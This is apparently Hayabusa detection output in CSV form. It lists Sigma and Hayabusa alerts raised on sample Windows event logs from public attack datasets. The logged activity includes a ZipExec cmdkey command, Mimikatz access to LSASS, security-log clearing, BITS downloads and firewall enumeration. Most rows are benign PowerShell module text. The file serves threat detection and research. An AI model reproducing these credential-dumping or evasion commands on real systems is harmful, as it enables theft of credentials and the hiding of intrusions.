+00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 15156 | PGUID: 00247C92-94D6-6171-0000-00103F5A967B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:02.999 +00:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:02.999 +00:00,LAPTOP-JU4M3I0E,1,medium,LatMov,Remote Desktop Protocol Use Mstsc,,rules/sigma/process_creation_sysmon/proc_creation_win_mstsc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 
16:27:03.398 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.523 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.549 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.549 +00:00,LAPTOP-JU4M3I0E,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.858 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" | Process: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 17264 | PGUID: 00247C92-94E0-6171-0000-00107424987B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.858 +00:00,LAPTOP-JU4M3I0E,1,high,Exec,Script Interpreter Execution From Suspicious 
Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_script_exec_from_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.858 +00:00,LAPTOP-JU4M3I0E,1,medium,Evas,Renamed Binary,,rules/sigma/process_creation_sysmon/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.858 +00:00,LAPTOP-JU4M3I0E,1,medium,Impact,Run from a Zip File,,rules/sigma/process_creation_sysmon/proc_creation_win_run_from_zip.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.858 +00:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.946 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 19000 | PGUID: 00247C92-94E0-6171-0000-0010B84D987B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.946 +00:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:14.015 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" | Process: 
C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run | LID: 0x779c2 | PID: 26868 | PGUID: 00247C92-94E0-6171-0000-00104337987B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 17:38:36.711 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination C:\Users\bits.ps1,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:36.711 +00:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:36.742 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Join-Path): ""Join-Path"" ParameterBinding(Join-Path): name=""Path""; value=""C:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer"" ParameterBinding(Join-Path): name=""ChildPath""; value=""Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:36.742 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""{8FA5064B-8479-4c5c-86EA-0D311FE48875}"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. 
All rights reserved."" ModuleVersion=""1.0.0.0"" PowerShellVersion=""2.0"" CLRVersion=""2.0"" NestedModules=""Microsoft.BackgroundIntelligentTransfer.Management"" FormatsToProcess=""BitsTransfer.Format.ps1xml"" RequiredAssemblies=Join-Path $psScriptRoot ""Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll"" CmdletsToExport=""Add-BitsFile"",""Complete-BitsTransfer"",""Get-BitsTransfer"",""Remove-BitsTransfer"",""Resume-BitsTransfer"",""Set-BitsTransfer"",""Start-BitsTransfer"",""Suspend-BitsTransfer"" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:36.742 +00:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:37.084 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Start-BitsTransfer): ""Start-BitsTransfer"" ParameterBinding(Start-BitsTransfer): name=""Priority""; value=""foreground"" ParameterBinding(Start-BitsTransfer): name=""Source""; value=""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md"" ParameterBinding(Start-BitsTransfer): name=""Destination""; value=""C:\Users\bits.ps1""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:37.084 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): 
""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:37.084 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is ""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:37.084 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". 
See `""get-help about_Command_Precedence`"" for more details.""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:37.100 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:53:42.530 +00:00,FS03.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: BITS Transfer | URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx +2021-10-21 20:40:12.867 +00:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: mimikatz.exe | Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1f4c65f | PID: 2032 | PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Hash: SHA1=D241DF7B9D2EC0B8194751CD5CE153E27CC40FA4,MD5=A3CB3B02A683275F7E0A0F8A9A5C9E07,SHA256=31EB1DE7E840A342FD468E558E5AB627BCB4C542A8FE01AEC4D5BA01D539A0FC,IMPHASH=DBDEA7B557F0E6B5D9E18ABE9CE5220A",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-21 20:40:43.120 +00:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: mimikatz.exe | LID: 
0x2e6dea4 | PID: 5040 | PGUID: 7CF65FC7-D04B-6171-1303-000000001200 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-21 20:40:43.136 +00:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 2032 | Src PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-21 20:40:43.136 +00:00,FS03.offsec.lan,10,medium,CredAccess,Rare GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/proc_access_win_rare_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-22 13:39:49.619 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 13:39:50.927 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x1328 | User: admmig | LID: 
0x1f4c65f,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 13:39:55.502 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x10c4 | User: admmig | LID: 0x1f4c65f,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 14:02:11.218 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-22 14:02:11.902 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /query /xml | Path: C:\Windows\System32\schtasks.exe | PID: 0xce0 | User: admmig | LID: 0x1f4c65f,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-22 14:02:15.177 +00:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3198a75,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-23 
21:50:11.666 +00:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx +2021-10-23 21:51:57.212 +00:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx +2021-10-25 07:23:05.426 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallProfile,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.457 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ ModuleVersion = '2.0.0.0' FormatsToProcess = 'NetSecurity.formats.ps1xml' TypesToProcess = 'NetSecurity.types.ps1xml' NestedModules = @( ""Microsoft.Windows.Firewall.Commands.dll"", ""NetFirewallRule.cmdletDefinition.cdxml"", ""NetIPsecRule.cmdletDefinition.cdxml"", ""NetIPsecMainModeRule.cmdletDefinition.cdxml"", ""NetFirewallAddressFilter.cmdletDefinition.cdxml"", ""NetFirewallApplicationFilter.cmdletDefinition.cdxml"", ""NetFirewallInterfaceFilter.cmdletDefinition.cdxml"", ""NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml"", ""NetFirewallSecurityFilter.cmdletDefinition.cdxml"", ""NetFirewallPortFilter.cmdletDefinition.cdxml"", ""NetFirewallServiceFilter.cmdletDefinition.cdxml"", ""NetIPsecPhase1AuthSet.cmdletDefinition.cdxml"", 
""NetIPsecPhase2AuthSet.cmdletDefinition.cdxml"", ""NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml"", ""NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml"", ""NetFirewallProfile.cmdletDefinition.cdxml"", ""NetIPsecPolicyChange.cmdletDefinition.cdxml"", ""NetIPsecDospSetting.cmdletDefinition.cdxml"", ""NetIPsecIdentity.cmdletDefinition.cdxml"", ""NetIPsecMainModeSA.cmdletDefinition.cdxml"", ""NetIPsecQuickModeSA.cmdletDefinition.cdxml"", ""NetFirewallSetting.cmdletDefinition.cdxml"", ""NetGPO.cmdletDefinition.cdxml"" ) GUID = '{4B26FF51-7AEE-4731-9CF7-508B82532CBF}' Author = 'Microsoft Corporation' CompanyName = 'Microsoft Corporation' PowerShellVersion = '3.0' ClrVersion = '4.0' Copyright = '© Microsoft Corporation. All rights reserved.' HelpInfoUri = ""http://go.microsoft.com/fwlink/?linkid=285764"" FunctionsToExport = @( ""Copy-NetFirewallRule"", ""Copy-NetIPsecMainModeCryptoSet"", ""Copy-NetIPsecMainModeRule"", ""Copy-NetIPsecPhase1AuthSet"", ""Copy-NetIPsecPhase2AuthSet"", ""Copy-NetIPsecQuickModeCryptoSet"", ""Copy-NetIPsecRule"", ""Disable-NetFirewallRule"", ""Disable-NetIPsecMainModeRule"", ""Disable-NetIPsecRule"", ""Enable-NetFirewallRule"", ""Enable-NetIPsecMainModeRule"", ""Enable-NetIPsecRule"", ""Get-NetFirewallAddressFilter"", ""Get-NetFirewallApplicationFilter"", ""Get-NetFirewallInterfaceFilter"", ""Get-NetFirewallInterfaceTypeFilter"", ""Get-NetFirewallPortFilter"", ""Get-NetFirewallProfile"", ""Get-NetFirewallRule"", ""Get-NetFirewallSecurityFilter"", ""Get-NetFirewallServiceFilter"", ""Get-NetFirewallSetting"", ""Get-NetIPsecDospSetting"", ""Get-NetIPsecMainModeCryptoSet"", ""Get-NetIPsecMainModeRule"", ""Get-NetIPsecMainModeSA"", ""Get-NetIPsecPhase1AuthSet"", ""Get-NetIPsecPhase2AuthSet"", ""Get-NetIPsecQuickModeCryptoSet"", ""Get-NetIPsecQuickModeSA"", ""Get-NetIPsecRule"", ""New-NetFirewallRule"", ""New-NetIPsecDospSetting"", ""New-NetIPsecMainModeCryptoSet"", ""New-NetIPsecMainModeRule"", ""New-NetIPsecPhase1AuthSet"", 
""New-NetIPsecPhase2AuthSet"", ""New-NetIPsecQuickModeCryptoSet"", ""New-NetIPsecRule"", ""Open-NetGPO"", ""Remove-NetFirewallRule"", ""Remove-NetIPsecDospSetting"", ""Remove-NetIPsecMainModeCryptoSet"", ""Remove-NetIPsecMainModeRule"", ""Remove-NetIPsecMainModeSA"", ""Remove-NetIPsecPhase1AuthSet"", ""Remove-NetIPsecPhase2AuthSet"", ""Remove-NetIPsecQuickModeCryptoSet"", ""Remove-NetIPsecQuickModeSA"", ""Remove-NetIPsecRule"", ""Rename-NetFirewallRule"", ""Rename-NetIPsecMainModeCryptoSet"", ""Rename-NetIPsecMainModeRule"", ""Rename-NetIPsecPhase1AuthSet"", ""Rename-NetIPsecPhase2AuthSet"", ""Rename-NetIPsecQuickModeCryptoSet"", ""Rename-NetIPsecRule"", ""Save-NetGPO"", ""Find-NetIPsecRule"", ""Set-NetFirewallAddressFilter"", ""Set-NetFirewallApplicationFilter"", ""Set-NetFirewallInterfaceFilter"", ""Set-NetFirewallInterfaceTypeFilter"", ""Set-NetFirewallPortFilter"", ""Set-NetFirewallProfile"", ""Set-NetFirewallRule"", ""Set-NetFirewallSecurityFilter"", ""Set-NetFirewallServiceFilter"", ""Set-NetFirewallSetting"", ""Set-NetIPsecDospSetting"", ""Set-NetIPsecMainModeCryptoSet"", ""Set-NetIPsecMainModeRule"", ""Set-NetIPsecPhase1AuthSet"", ""Set-NetIPsecPhase2AuthSet"", ""Set-NetIPsecQuickModeCryptoSet"", ""Set-NetIPsecRule"", ""Show-NetFirewallRule"", ""Show-NetIPsecRule"", ""Sync-NetIPsecRule"", ""Update-NetIPsecRule"" ) CmdletsToExport = @( ""Get-DAPolicyChange"", ""New-NetIPsecAuthProposal"", ""New-NetIPsecMainModeCryptoProposal"", ""New-NetIPsecQuickModeCryptoProposal"" ) AliasesToExport = @( ) }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.536 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallRule 
",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.536 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.536 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if 
($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] 